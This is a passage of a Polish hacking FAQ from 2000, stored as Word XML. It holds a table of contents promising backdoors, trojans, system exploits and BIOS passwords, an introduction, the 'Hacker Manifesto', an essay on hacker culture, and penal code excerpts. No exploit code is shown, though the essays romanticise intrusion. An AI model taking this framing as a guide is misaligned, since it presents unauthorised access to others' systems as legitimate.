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o.o.o' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>MSS-FAQ POLAND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'o.o.o</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First Edition</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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>[ MSS-00670-6681 FAQ ]</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ritten by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jerry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>&lt;jerry@suntar.com.pl&gt;</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ordPad</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Go to visit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://hacking.pl</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3 lipca 2000, 13:58</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FAQ pisany pod WordPad'em</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olejne wersje tego FAQ'u znajdziecie na stronach hacking.pl</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ziękuję wszystkim bez zgody których zamieściłem tutaj ich teksty...</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SS-FAQ możecie umieszczać gdzie chcecie byleby pozostał w niezmienio-nej formie. Jeśli jednak ktoś chce wykorzytać materiały z mojego FAQ w swoim niech mi o tym da znac emailowo: jerry@suntar.com.p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t;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SPIS TREŚĆI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&l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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>WSTE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2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>INFORMACJE DLA POCZĄTKUJĄC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Co powinieneś wiedzieć - czym jest Hakerstw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Co Ci za to groz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Sławni HAKERZ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ab/>
        <w:t xml:space="preserve"> 3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>LINUX - PODSTAW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Podstawowe wiadomośc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800000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>HACKING</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Co to jest BACKDOO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Przykłady postawienia BACKDOOR'só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ab/>
        <w:t xml:space="preserve"> &gt; backdoor na por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ab/>
        <w:t xml:space="preserve"> &gt; backdoor na cron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ab/>
        <w:t xml:space="preserve"> &gt; backdoor na hasł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Co to jest KOŃ TROJAŃSK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Koń Trojanski passw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Lame Admin</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Spowalnianie system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Exploity dla Linuxa - różne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    &gt;&gt; Exploit dla SunO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Exploity dla RedHat 6.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    &gt;&gt; Exploity dla Slackwa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Exploity dla Irix</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Exploity dla FreeBSD mtr-0.41</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Exploity dla Sendmailó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Exploity dla Pi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Sendmail scanne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ab/>
        <w:t xml:space="preserve"> 5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>WINDOW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Rejestr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PW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Jak utrudnić komuś życ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Sztuczk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6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>DODATK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Firewall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ab/>
        <w:t xml:space="preserve"> &gt; Zapory ogniow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ab/>
        <w:t xml:space="preserve"> &gt; Rodzaje zapór ogniow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ab/>
        <w:t xml:space="preserve"> &gt; Cechy zapór ogniow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ab/>
        <w:t xml:space="preserve"> &gt; Zapory ogniowe nie-komercyj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Krótka i polska instrukcja konfigurowania sendmail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gt;&gt; Uniwersalne hasła BIOS'ó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7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Specjalne podziękowania</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WSTĘP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st to mój pierwszy faq więc proszę o zrozumiałość.</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 tym FAQu stawiam mniejszy nacisk na podstawy dla osób początkujących które dopiero obracają się w tych undergroundowych kręgach.</w:t>
        <w:br/>
        <w:t>I właśne dla tych osób proponuję ściągnąc sobie HACKERS FAQ - Pomoc dla początkujących Hackerów. Bardzo szczegółowy opis najczęściej używanych komend i poleceń. Poleca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czywiście (jak w każdym faqu) nie ponoszę odpowiedzialności za żadne skutki, wynikające z niewłaściwego korzystania z tego FAQu. Wszystko co robisz, robisz na własną odpowiedzialność!!! Wiadomości zawarte w tym FAQu są wiadomościami napisanymi w celach edukacyjnych. Jeśli masz zamiar wykorzystać je, najpierw zastanów się czy orientujesz się na tyle dobrze w tej dziedzinie, tak aby nie narobić sobie kłopotó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Niektóre texty są wstawkami z innych bardzo dobrych faqów. Przepisałem je dla tego, że nie umiałbym lepiej sformułować danego tematu czy wypowiedzi. Tak więc, z góry dziękuje autorom tych faqów.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ie zwlekając dłużej, zapraszam do przeczytania tego FAQ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INFORMACJE DLA POCZĄTKUJĄCYCH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Co powinieneś wiedzieć - czym jest HAKERSTWO? &lt;&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 początku każdy początkujący powinien zapoznać się z samą definicją, znaczeniem słowa HAKER. Następną rzeczą z którą powinieneś się zapoznać to historia i środowisko w jakim działają Ci prawdziwi Hakerz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 sieci jest dużo osób które myślą, żę hacking polega na włamywaniu się do systemu i zniszczeniu wszystkich zapisanych tam danych. Ściągają sobie rozmaite exploity (programy) które odpalą na pierwszym lepszym serwerze, dostaną root'a (albo i nie), narobią syfu i po tym wszystkim nazywają się Hakerami. Niestety Ci ludzie są w wielkim błędzie. Prawdziwi Hakerzy włamują się po to żeby poznać dokładniejszą budowe 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asadę działania danego systemu. Oni mają satysfakcję z tego, że złamali kolejny system, że są lepsi. Prawdziwi Hakerzy posiadają swój język, swoją etykę, kulturę i tryb życia z którym także powinieneś się zapoznać. Jeżeli już zapoznasz się z ogólnymi informacjami powinieneś zastanowić się nad dalszą swoją działalnością. Idea hackingu jest bardzo piekna, tylko niekiedy bardzo trudna w praktyce. Powinieneś kształcić się w zakresie administracji systemem, programowaniem w języku c++, wykrywaniu intruzów w sieci it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winieneś dokładnie przestudiować każdy zdobyty exploit, poznac jego budowę i zasadę działania. Nie zaszkodzi także przeczytać nieco starszych textów i faqów, nie wspominając już tu o tych znacznie nowszych. Bardzo dobrym sposobem na zdobywanie wiedzy jest czytanie książek (oczywiście o tematyce komputerowej).</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prawdę jest bardzo dużo książek z których dużo można się nauczyć i dowiedzieć.</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zwolę sobie przytoczyć teraz refleksję nieznanego autora z Polsk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Moja refleksj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Jesteśmy mała drobinką w świetle ogarniającego nas Wrzechświata...</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Wszystko jest niczym w porównaniu z Dziełem Stworzenia... Życie nie ma sensu, a jeśli ma, to tylko w naszym marnym świecie nazwanym Ziemią... Wszystko jest tu względne... A Wielki patrzy i myśli co będzie dalej...</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Nie jesteśmy sami, jest wiele innych cywilizacji we Wrzechświecie.</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NIektóre są bardziej rozwinięte od nas, sa na wyższym stopniu duchowym... I dla nich zupełnie inne wartości maja wyższy sens. W tej chwili nie widzę sensu życia. Po co się człowiek rodzi jak i tak umrze i przejdzie do wyższego poziomu rozwoju duchowego? Co ma sens?? Miłość, jak się ma kogoś, kto kocha, to może i tak. Otoz ja mam taka osobę, którą kocham, ale mimo wszystko nie straciłem wiary w stare wartości... Po co żyjemy? Jaki jest w tym sens? Gdzies pisali że Stwórca stworzył człowieka, ponieważ był samotny... A jest napisane że będzie OMEGA, ale po co niszczyć coś co się stworzyło dla wyższego celu?? A na swoje podobienstwo, ponieważ człowiek umie kochać, tak jak Bóg, który</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umiłował człowieka nade wszystko...</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Jestem pseudo Anarchistą, bo nie widzę sensu tego całego gówna...</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Prawie wszystko mi wali! Ale niestety nie możemy powiedzieć sobie: "DOŚĆ!" Bo to wszystko ma sens, ale tylko w naszym małym światku, w którym żyjemy.</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Niektórzy nie zauważają, że ten mały światek nie ma wyższego sensu.</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I wszysko jest w nim do chrzanu.</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Jestem Anarchista, ale przede wszystkim Hackerem, czyli buntownikiem</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Chcę odkrywać nie zbadane systemy, poznawać ich budowe.</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I mieć satysfakcję, że złamałem kolejny i że jestem leprzy od innych, którzy to stworzyli i zarządzają tym shitem...</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Ktoś może powiedzieć co za palant, pisze najebane texty i wogóle. Jesli tak myślisz, to znaczy ze wogóle nie pojąłeś idei tego textu, jego przesłania.</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nonim...</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 tym wstępie chciał bym jeszcze przytoczyć słowa mentor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zytaj je powoli - są w orginalnym języku bo tylko on oddaje ich głębię...)</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Mentor's Last Words"</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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Another one got caught today, it's all over the papers.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Teenager Arrested in Computer Crime Scandal", "Hacker Arrested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after Bank Tampering"... Damn kids.  They're all alike. But did</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you, in your three-piece psychology and 1950's technobrain,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ever take a look behind the eyes of the hacker?  Did you ever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wonder what made him tick, what forces shaped him, what may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have molded him? I am a hacker, enter my world...Mine is a</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world that begins with school... I'm smarter than most of the</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other kids, this crap they teach us bores me...  Damn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underachiever.They're all alike. I'm in junior high or high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school.  I've listened to teachers explain for the fifteenth</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time how to reduce a fraction.I understand it.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No, Ms. Smith, I didn't show my work.  I did it in my head..."</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Damn kid.  Probably copied it.  They're all alike.I made a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discovery today.  I found a computer.  Wait a second, this is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cool.  It does what I want it to.  If it makes a mistake, it's</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because I screwed it up.  Not because it doesn't like me...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Or feels threatened by me.. Or thinks I'm a smart ass.. Or</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doesn't like teaching and shouldn't be here... Damn kid.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All he does is play games.  They're all alike. And then it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happened... a door opened to a world... rushing through the</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phone line like heroin through an addict's veins, an electronic</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pulse is sent out, a refuge from the day-to-day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incompetencies is sought... a board is found.</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This is it... this is where I belong..." I know everyone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here... even if I've never met them, never talked to them,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may never hear from them again... I know you all... Damn kid.</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Tying up the phone line again.They're all alike... You bet your</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ass we're all alike... we've been spoon-fed baby food at school</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when we hungered for steak... the bits of meat that you did let</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slip through were pre-chewed and tasteless.We've been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dominated by sadists, or ignored by the apathetic.  The few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that had something to teach found us willing pupils, but those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few are like drops of water in the desert.This is our world </w:t>
        <w:tab/>
        <w:t>now...</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the world of the electron and the switch, the beauty of the baud.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We make use of a service already existing without paying for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what could be dirt-cheap if it wasn't run by profiteering </w:t>
        <w:tab/>
        <w:t>gluttons,</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and you call us criminals.  We explore... and you call us </w:t>
        <w:tab/>
        <w:t>criminals.</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We seek after knowledge... and you call us criminals.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We exist without skin color, without nationality,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without religious bias...and you call us criminals.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You build atomic bombs, you wage wars, you murder,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cheat, and lie to us and try to make us believe it's for</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>our own good, yet we're the criminals.</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Yes, I am a criminal.</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 xml:space="preserve">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My crime is that of curiosity.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My crime is that of judging people by what they say and think,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not what they look like.</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My crime is that of outsmarting you, something that you will </w:t>
        <w:tab/>
        <w:t>never forgive me for.</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I am a hacker,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and this is my manifesto.  You may stop this individual,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>but you can't stop us all... after all, we're all alike.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">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ab/>
        <w:t xml:space="preserve">                        +++The Mentor+++</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>[May the members of the phreak community never forget his words -J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HACKER (definicj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Zwykle zdolny programista i ekspert od komputerów dysponujący rozległą wiedzą i potrafiący znakomicie korzystać z niej w praktyce. Hacker dzięki swoim umiejętnościom jest w stanie łamać najlepsze zabezpieczenia np. sieci komputerowych. Nawet wtedy gdy używa swojej wiedzy do działań niezgodnych z prawem, nie powoduje szkód, nie niszczy danych, ani nie wykrada ich dla zysku, nie próbuje także zacierać za sobą śladów w sposób brutalny, np. kasując system operacyjny komputera, na który się włamał.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Termin "hacker" ludziom związanym z komputerami kojarzy się dość jednoznacznie - w ich mniemaniu hackerzy postrzegani są jako przestępcy, niebezpieczni maniacy, których należałoby zamknąć za kratkami dla dobra Ludzkości. Takie mniemanie, mimo iż nie pozbawione pewnych racji jest zazwyczaj mocno przesadzone, zaś błędne opinie i rozmaite mity, krążące w komputerowym światku, biorą się przeważnie z braku zainteresowania czy wręcz celowej dezinformacji często wywoływanej przez media. Jednak prawda o hackerach zdecydowanie różni się od obiegowych teorii, jakie słyszymy na co dzień w środkach masowego przekazu.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iększość problemów bierze się z niezrozumienia, kim właściwie są hackerzy i czym się zajmują. Gdyby spytać ich, co oznacza termin "hacker", prawdopodobnie odpowiedzieliby, że chodzi o cieślę lub stolarza, który w pracy korzysta z siekiery (takie jest właśnie pierwotne znaczenie tego słowa!). W środowiskach "świadomych użytkowników Sieci" egzystuje kilka (około pięciu) obiegow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definicji tego słowa, przy czym żadne (!) z nich nie określa hackera jako osobnika penetrującego komputery i sieci komputerowe w celach destrukcyjno - dezorganizacyjnych. Taką działalność przypisuje się krakerom (crackerom); nie są oni zbyt lubiani przez resztę komputerowej społeczności (nic w tym dziwnego, skoro to oni są przyczyną podłej reputacji komputerowych guru wśród sieciowej społecznośc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HISTORI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 czasach, gdy sieci komputerowe były elementem wyposażenia niektór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bogatszych) uniwersytetów stanowych w USA, większość użytkowników korzystała z jednego komputera (klasy mainframe, wyposażonego w archaiczne pamięci bębnowe i stosującego podział czasu). Nikt wtedy nie myślał o hackerach jako młodych wandalach przeklinanych przez przytłaczającą większość "normalnych użytkowników" . Wtedy (a była to połowa lat siedemdziesiątych) termin ten oznaczał osobnika biegłego w zagadnieniach związanych z komputerami - niemal wszyscy wywodzili się ze środowisk uniwersyteckich i placówek naukowych USA. Z czasem pojęcie to rozszerzono tak, że nie dotyczyło tylko komputerów i informatyki, ale też i innych dziedzin nauki (np. fizyki i elektroniki). Hackerstwo (ang. hackerdom lub hakerdom) wiązało się mocno z ruchem hipisowskim. Do tej pory z tego ruchu hackerzy zaczerpnęli tolerancję wyrażana przez współczesnych "komputerowców" i skłonność do wszelkiego rodzaju używek. W miarę rozwoju technologii teleinformatycznych domeną hackerów stawały się sieci komputerowe i systemy rozległe, w końcu "przerzucili się" też na Internet.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arto również wspomnieć o odłamie czy też podgrupie hackerów, jaką są</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hreakerzy (inaczej phreakowie. ang. phreaks). Zajmują się oni penetracją sieci telefonicznych i systemów BBS. stąd też wywodzi się nazwa najsłynniejszej na świecie grupy hackerskiej - 2600 Hz (jest to specyficzna częstotliwość standardu DTMF - tzw. hangup tone). Phreaking wywodzi się ze specyficznej "rozrywki", jaką był kiedyś tech-hacking - działalność polegająca na dokonywaniu drobnych (zazwyczaj) przeróbek w różnych urządzeniach (oprócz komputerów, ofiarą takich żartów padały np. układy sterowania windami w akademikach czy dystrybutory napojów) - tak by zaskoczyły swą funkcjonalnością innych użytkowników.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ŚRODOWISK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becnie, jak nietrudno się domyślić, główną "atrakcją" hackerów jest Internet, choć inne formy ich działalności, takie jak phreaking, cieszą się nadal pewną popularnością. Ogólnie rzecz biorąc, główną motywacją do działania hakerów jest chęć dogłębnego poznania danego tematu, tak że wkrótce stają się specjalistami w swej dziedzinie. Nie zadowala ich opanowanie np. obsługi komputerów w takim stopniu, jak innych użytkowników (ich zdaniem - jest to wiedza minimalna, wystarczająca zaledwie do codziennej pracy), stąd też odnoszą się do nich pobłażliwością czy wręcz pogardą. Nie znoszą też ignorantów wypowiadających się w kwestii, o której nie mają głębszego pojęcia (powstało nawet określenie takiego osobnika: lamer). Hackerzy zrzeszają się w grupy (największe z nich to 2600 Hz , Silicon Toad, Black Squadron), tworzą w poszczególnych krajach tzw. sceny hackerskie (jest to największy rodzaj formacji, skupiający wiele grup analogicznie do demosceny), organizują też imprezy, np. Hacking In Progres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Szanujące się grupy mają własne serwery internetowe, za pomocą których dzielą się z każdym użytkownikiem Sieci zdobytą wiedzą.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JĘZY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dnym z elementów charakteryzujących tę grupę jest specyficzny języ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dentyfikujący hackerów na całym świecie, bez względu na ich język ojczysty. Powstały na bazie języka angielskiego (a właściwie amerykańskiego) konglomerat zawiera zarówno określenia slangowe, jak i dużo fachowych określeń informatycznych. Efekt końcowy zwie się slangiem, żargonem (ang. jargon) lub techspeakiem w zależności od tego, czy w języku przeważają określenia fachowe (tzn. informatyczne), czy też dominuje język "młodzieżowy". Język ten - czy może żargon pełen jest neologizmów, stosowane są także rozwiązania ogólnie określane mianem hackspeku (specyficzne skracanie wyrazów np. zamiast "fo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iszemy 4. "ck" zmienia się w "k") - wynalazki te narodziły się zapewne podczas długich sesji przed terminalami tekstowymi. Jest też to język zabawny, a nawet ironiczny; niestety, trudno posłużyć się sensownym przykładem z racji nieprzekładalności "żargonu" na język polski. Efektem komunikacji terminalowej jest też ASCII art - rysunki wykonane za pomocą standardowych znaków semigraficznych (to z nich rozwinęły się emotikony a także inne serie zabawnych rysuneczków, np. krowy).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ETYK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dstawowym dogmatem ideologicznym hackerów jest swobodny przepływ informacji (we wszystkich jej postaciach). Stąd też wynika poczucie obowiązku dzielenia się wiedzą ze wszystkimi chętnymi (efektem tego są bogate zbiory wszelkiego rodzaju porad dla początkujących "sieciowych szperaczy": manualz, exploitz, FAQs itp. dostępne w Internecie i na BBS-ach) i tworzenie darmowego oprogramowania. Niestety, niektórzy w imię tej szlachetnej idei posuwają się odrobinę za daleko (do łamania zabezpieczeń programów komercyjnych) - to odwieczna kość niezgody między informatycznym podziemiem a producentami software'u. Większość hackerów wykazuje też pewne tendencje anarchistyczne - przynajmniej w kwestii wolności słowa i braku autorytatywnego zwierzchnictwa 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nternecie. Generalnie potępiają oni przemoc i przestępstwa komputerow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opełniane "just for funn" - włamania do hostów internetowych są czymś złym, chyba że w konkretnej sytuacji istniał racjonalny powód uzasadniający takie postępowanie. Zupełnie inną kwestią jest nieszkodliwa eksploracja maszyn sieciowych i BBS-ów.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KULTUR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W zasadzie opiera się w całości na komputerach; komputery są tematem "badań" hackerów, lecz są także medium pozwalającym na komunikację. W tym środowisku powszechne są przyjaźnie z osobami, których się nigdy nie widziało! W ciągu dwudziestu lat (w przybliżeniu tyle czasu działa ruch hackerski) wykształcił się indywidualny, niepowtarzalny język, powstała też masa anegdot, dowcipów i mitów związanych ze słynnymi informatykami (np. z Marvinem Minskym, Tomem Knightem i Davidem Moonem). Z historii popularnych w "środowisku" przebija przeświadczenie o nadprzyrodzonym charakterze urządzeń technicznych (głównie komputerów, choć nie tylko), a także świadomość, że hacker na co dzień obcuje z  "magią" (jednak używane angielskie słowo magic ma trochę inne znaczenie niż w języku powszednim). Powstają nawet poematy traktujące o "bohaterach informatyki" - przykładem jest "Historia Mela. Prawdziwego Programisty" napisana przez Eda Natcher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TRYB ŻYCI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ak nietrudno zgadnąć, przytłaczająca większość "komputerowych guru" t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mężczyźni (ciekawe dlaczego), raczej młodzi (tzn. do trzydziestego roku życia). Większość "starej kadry" czyli pionierów hackerstwa, pracuje teraz w poważnych korporacjach informatycznych, takich jak np. Netscape Communications. Styl życia przedstawicieli informatycznego podziemia nie zmienił się zbytnio przez ten czas - nadal zdominowany jest przez amerykańską kulturę masową. Styl ten charakteryzuje się lekceważącym podejściem do rzeczywistości i immanentnym cynizmem wyrażanym w kontaktach międzyludzkich. Lecz hackerów cechuje także optymizm i (swoiste) poczucie humoru, będące głównym motorem do tworzenia różnych dowcipów (nie wyłączając ataków sieciowych!). Widać to zresztą na przykładzie ich języka - używane skróty, żarty, żargonowe określenia i publikowane dokumentacje nacechowane są specyficznym i niepowtarzalnym dowcipem, być może nieco trudnym do zrozumienia dla przeciętnego netsurfera. Hackerom nieobce są "lekkie" narkotyki (marihuana, LSD), niektórzy z nich twierdzą, iż używają tego typu środków. by zwiększyć efektywność pracy przy komputerze. Lubią literaturę science fiction, słuchają rocka (lub coraz częściej muzyki elektronicznej), dość swobodnie wypowiadają się w kwestii religii (sporą popularnością cieszą się wśród hackerów religie i filozofie Dalekiego wschodu, a także nurty neopogańskie) i polityk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INFORMACJE DLA POCZĄTKUJĄCYCH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Co Ci za to grozi? &lt;&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 dziale Co powinieneś wiedzieć - czym jest Hakerstwo?, zapaznałeś się już z podstawowymi zagadnieniami i ideologią Hakera jak i samego Hackingu. Jak już zapewne wiesz działalność hackingu jest nielegaln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Nowy kodeks Karn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br/>
        <w:t>Lista co ciekawszych paragrafów z Nowego kodeksu Karnego dotycząca przestępstw komputerowych i nie tylk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rt.13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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kto, w celu udzielenia obcemu wywiadowi wiadomości określonych w   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>§2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, gromadzi je, przechowuje, włącza się do sieci komputerowej w celu ich uzyskania albo zgłasza gotowość działania na rzecz obcego wywiadu przeciwko Rzeczpospolitej Polskiej podlega karze pozbawienia wolności od 6 miesięcy do lat 8.</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rt.267</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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>: Kto bez uprawnienia uzyskuje informacje dla niego nie przeznaczona, otwierając zamknięte pismo, podłączając się do przewodu służącego do przekazywania informacji lub przełamując elektroniczne, magnetyczne albo inne szczególne jej zabezpieczenie podlega grzywnie, karze ograniczenia wolności lub pozbawienia wolności do lat 2.</w:t>
        <w:b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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>: Tej samej karze podlega, kto w celu uzyskania informacji, do której jest nieuprawniony, zakłada lub posługuje się urządzeniem podsłuchowym, wizualnym albo innym urządzeniem specjalnym.</w:t>
        <w:b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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
